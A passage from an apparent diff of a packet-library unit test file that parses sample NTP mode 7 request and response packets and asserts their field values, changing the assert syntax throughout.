== 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 7) -assert(p.data[0].timereset == 2798) -assert(p.data[0].totalpeermem == 15) -assert(p.data[0].freepeermem == 13) -assert(p.data[0].findpeer_calls == 60) -assert(p.data[0].hashcount[25] == 1 and p.data[0].hashcount[89] == 1) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 7 +assert p.data[0].timereset == 2798 +assert p.data[0].totalpeermem == 15 +assert p.data[0].freepeermem == 13 +assert p.data[0].findpeer_calls == 60 +assert p.data[0].hashcount[25] == 1 and p.data[0].hashcount[89] == 1 = NTP Private (mode 7) - REQ_LOOP_INFO (1) - request s = b'\x17\x00\x03\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 8) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 8 = NTP Private (mode 7) - REQ_LOOP_INFO (2) - response s = b'\x97\x00\x03\x08\x00\x01\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 8) -assert(p.data[0].last_offset == 0.0) -assert(p.data[0].watchdog_timer == 4) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 8 +assert p.data[0].last_offset == 0.0 +assert p.data[0].watchdog_timer == 4 = NTP Private (mode 7) - REQ_TIMER_STATS (1) - request s = b'\x17\x00\x03\t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 9) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 9 = NTP Private (mode 7) - REQ_TIMER_STATS (2) - response s = b'\x97\x00\x03\t\x00\x01\x00\x10\x00\x00\x01h\x00\x00\x01h\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 9) -assert(p.data[0].timereset == 360) -assert(p.data[0].alarms == 360) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 9 +assert p.data[0].timereset == 360 +assert p.data[0].alarms == 360 = NTP Private (mode 7) - REQ_CONFIG (1) - request s = b'\x17\x80\x03\n\x00\x01\x00\xa8\xc0\xa8zm\x01\x03\x06\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xec\x93\xb1\xa8\xa0a\x00\x00\x00\x01Z\xba\xfe\x01\x1cr\x05d\xa1\x14\xb1)\xe9vD\x8d' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 10) -assert(p.nb_items == 1) -assert(p.data_item_size == 168) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfPeer)) -assert(p.req_data[0].peeraddr == "192.168.122.109") -assert(p.req_data[0].hmode == 1) -assert(p.req_data[0].version == 3) -assert(p.req_data[0].minpoll == 6) -assert(p.req_data[0].maxpoll == 10) -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'5abafe011c720564a114b129e976448d') +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 10 +assert p.nb_items == 1 +assert p.data_item_size == 168 +assert hasattr(p, 'req_data') +assert isinstance(p.req_data[0], NTPConfPeer) +assert p.req_data[0].peeraddr == "192.168.122.109" +assert p.req_data[0].hmode == 1 +assert p.req_data[0].version == 3 +assert p.req_data[0].minpoll == 6 +assert p.req_data[0].maxpoll == 10 +assert hasattr(p, 'authenticator') +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'5abafe011c720564a114b129e976448d' = NTP Private (mode 7) - REQ_CONFIG (2) - response s = b'\x97\x00\x03\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 10) -assert(p.err == 0) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 0 +assert p.request_code == 10 +assert p.err == 0 +assert p.nb_items == 0 +assert p.data_item_size == 0 = NTP Private (mode 7) - REQ_UNCONFIG (1) - request s = b'\x17\x80\x03\x0b\x00\x01\x00\x18\xc0\xa8zk\x00\x00\x00\x00X\x88P\xb1\xff\x7f\x00\x008\x88P\xb1\xff\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xf0\x1bq\xc8\xe5\xa6\x00\x00\x00\x01\x1dM;\xfeZ~]Z\xe3Ea\x92\x9aE\xd8%' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 11) -assert(p.nb_items == 1) -assert(p.data_item_size == 24) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfUnpeer)) -assert(p.req_data[0].peeraddr == "192.168.122.107") -assert(p.req_data[0].v6_flag == 0) -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'1d4d3bfe5a7e5d5ae34561929a45d825') +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 11 +assert p.nb_items == 1 +assert p.data_item_size == 24 +assert hasattr(p, 'req_data') +assert isinstance(p.req_data[0], NTPConfUnpeer) +assert p.req_data[0].peeraddr == "192.168.122.107" +assert p.req_data[0].v6_flag == 0 +assert hasattr(p, 'authenticator') +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'1d4d3bfe5a7e5d5ae34561929a45d825' = NTP Private (mode 7) - REQ_UNCONFIG (2) - response s = b'\x97\x00\x03\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 11) -assert(p.err == 0) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 0 +assert p.request_code == 11 +assert p.err == 0 +assert p.nb_items == 0 +assert p.data_item_size == 0 = NTP Private (mode 7) - REQ_RESADDFLAGS (1) - request s = b'\x17\x80\x03\x11\x00\x01\x000\xc0\xa8zi\xff\xff\xff\xff\x04\x00\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xf0V\xa9"\xe6_\x00\x00\x00\x01>=\xb70Tp\xee\xae\xe1\xad4b\xef\xe3\x80\xc8' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 17) -assert(p.nb_items == 1) -assert(p.data_item_size == 48) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfRestrict)) -assert(p.req_data[0].addr == "192.168.122.105") -assert(p.req_data[0].mask == "255.255.255.255") -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'3e3db7305470eeaee1ad3462efe380c8') +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 17 +assert p.nb_items == 1 +assert p.data_item_size == 48 +assert hasattr(p, 'req_data') +assert isinstance(p.req_data[0], NTPConfRestrict) +assert p.req_data[0].addr == "192.168.122.105" +assert p.req_data[0].mask == "255.255.255.255" +assert hasattr(p, 'authenticator') +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'3e3db7305470eeaee1ad3462efe380c8' = NTP Private (mode 7) - REQ_RESSUBFLAGS (1) - request s = b'\x17\x80\x03\x12\x00\x01\x000\xc0\xa8zi\xff\xff\xff\xff\x00\x10\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xf0F\xe0C\xa9@\x00\x00\x00\x01>e\r\xdf\xdb\x1e1h\xd0\xca)L\x07k\x90\n' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 18) -assert(p.nb_items == 1) -assert(p.data_item_size == 48) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfRestrict)) -assert(p.req_data[0].addr == "192.168.122.105") -assert(p.req_data[0].mask == "255.255.255.255") -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'3e650ddfdb1e3168d0ca294c076b900a') +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 18 +assert p.nb_items == 1 +assert p.data_item_size == 48 +assert hasattr(p, 'req_data') +assert isinstance(p.req_data[0], NTPConfRestrict) +assert p.req_data[0].addr == "192.168.122.105" +assert p.req_data[0].mask == "255.255.255.255" +assert hasattr(p, 'authenticator') +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'3e650ddfdb1e3168d0ca294c076b900a' = NTP Private (mode 7) - REQ_RESET_PEER (1) - request s = b"\x17\x80\x03\x16\x00\x01\x00\x18\xc0\xa8zf\x00\x00\x00\x00X\x88P\xb1\xff\x7f\x00\x008\x88P\xb1\xff\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xef!\x99\x88\xa3\xf1\x00\x00\x00\x01\xb1\xff\xe8\xefB=\xa9\x96\xdc\xe3\x13'\xb3\xfc\xc2\xf5" p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 22) -assert(p.nb_items == 1) -assert(p.data_item_size == 24) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfUnpeer)) -assert(p.req_data[0].peeraddr == "192.168.122.102") -assert(p.req_data[0].v6_flag == 0) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 22 +assert p.nb_items == 1 +assert p.data_item_size == 24 +assert hasattr(p, 'req_data') +assert isinstance(p.req_data[0], NTPConfUnpeer) +assert p.req_data[0].peeraddr == "192.168.122.102" +assert p.req_data[0].v6_flag == 0 = NTP Private (mode 7) - REQ_AUTHINFO (1) - response s = b'\x97\x00\x03\x1c\x00\x01\x00$\x00\x00\x01\xdd\x00\x00\x00\x02\x00\x00\x00\n\x00\x00\x00`\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\x01' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 28) -assert(p.err == 0) -assert(p.nb_items == 1) -assert(p.data_item_size == 36) -assert(hasattr(p, 'data')) -assert(isinstance(p.data[0], NTPInfoAuth)) -assert(p.data[0].timereset == 477) -assert(p.data[0].numkeys == 2) -assert(p.data[0].numfreekeys == 10) -assert(p.data[0].keylookups == 96) -assert(p.data[0].keynotfound == 0) -assert(p.data[0].encryptions == 9) -assert(p.data[0].decryptions == 47) -assert(p.data[0].expired == 0) -assert(p.data[0].keyuncached == 1) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 0 +assert p.request_code == 28 +assert p.err == 0 +assert p.nb_items == 1 +assert p.data_item_size == 36 +assert hasattr(p, 'data') +assert isinstance(p.data[0], NTPInfoAuth) +assert p.data[0].timereset == 477 +assert p.data[0].numkeys == 2 +assert p.data[0].numfreekeys == 10 +assert p.data[0].keylookups == 96 +assert p.data[0].keynotfound == 0 +assert p.data[0].encryptions == 9 +assert p.data[0].decryptions == 47 +assert p.data[0].expired == 0 +assert p.data[0].keyuncached == 1 = NTP Private (mode 7) - REQ_ADD_TRAP (1) - request s = b'\x17\x80\x03\x1e\x00\x01\x000\x00\x00\x00\x00\xc0\x00\x02\x03H\x0f\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xedB\xdd\xda\x7f\x97\x00\x00\x00\x01b$\xb8IM.\xa61\xd0\x85I\x8f\xa7\'\x89\x92' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 1) -assert(p.request_code == 30) -assert(p.err == 0) -assert(p.nb_items == 1) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfTrap)) -assert(p.req_data[0].trap_address == '192.0.2.3') -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'6224b8494d2ea631d085498fa7278992') +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 1 +assert p.request_code == 30 +assert p.err == 0 +assert p.nb_items == 1 +assert hasattr(p, 'req_data') +assert isinstance(p.req_data[0], NTPConfTrap) +assert p.req_data[0].trap_address == '192.0.2.3' +assert hasattr(p, 'authenticator') +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'6224b8494d2ea631d085498fa7278992' = NTP Private (mode 7) - REQ_ADD_TRAP (2) - response s = b'\x97\x00\x03\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 30) -assert(p.err == 0) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 0 +assert p.request_code == 30 +assert p.err == 0 +assert p.nb_items == 0 +assert p.data_item_size == 0 = NTP Private (mode 7) - REQ_CLR_TRAP (1) - request s = b'\x17\x80\x03\x1f\x00\x01\x000\x00\x00\x00\x00\xc0\x00\x02\x03H\x0f\x00\x00\x00\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xedb\xb3\x18\x1c\x00\x00\x00\x00\x01\xa5_V\x9e\xb8qD\x92\x1b\x1c>Z\xad]*\x89' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 1) -assert(p.request_code == 31) -assert(p.err == 0) -assert(p.nb_items == 1) -assert(hasattr(p, 'req_data')) -assert(isinstance(p.req_data[0], NTPConfTrap)) -assert(p.req_data[0].trap_address == '192.0.2.3') -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'a55f569eb87144921b1c3e5aad5d2a89') +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 1 +assert p.request_code == 31 +assert p.err == 0 +assert p.nb_items == 1 +assert hasattr(p, 'req_data') +assert isinstance(p.req_data[0], NTPConfTrap) +assert p.req_data[0].trap_address == '192.0.2.3' +assert hasattr(p, 'authenticator') +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'a55f569eb87144921b1c3e5aad5d2a89' = NTP Private (mode 7) - REQ_CLR_TRAP (2) - response s = b'\x97\x00\x03\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 31) -assert(p.err == 0) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 0 +assert p.request_code == 31 +assert p.err == 0 +assert p.nb_items == 0 +assert p.data_item_size == 0 = NTP Private (mode 7) - REQ_GET_CTLSTATS - response s = b'\x97\x00\x03"\x00\x01\x00<\x00\x00\x00\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 34) -assert(p.nb_items == 1) -assert(p.data_item_size == 60) -assert(type(p.data[0]) == NTPInfoControl) -assert(p.data[0].ctltimereset == 237) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 0 +assert p.request_code == 34 +assert p.nb_items == 1 +assert p.data_item_size == 60 +assert type(p.data[0]) == NTPInfoControl +assert p.data[0].ctltimereset == 237 = NTP Private (mode 7) - REQ_GET_KERNEL (1) - request s = b'\x17\x00\x03&\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 38) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 0 +assert p.request_code == 38 +assert p.nb_items == 0 +assert p.data_item_size == 0 = NTP Private (mode 7) - REQ_GET_KERNEL (2) - response s = b'\x97\x00\x03&\x00\x01\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf4$\x00\x00\xf4$\x00 A\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 38) -assert(p.nb_items == 1) -assert(p.data_item_size == 60) -assert(isinstance(p.data[0], NTPInfoKernel)) -assert(p.data[0].maxerror == 16000000) -assert(p.data[0].esterror == 16000000) -assert(p.data[0].status == 8257) -assert(p.data[0].constant == 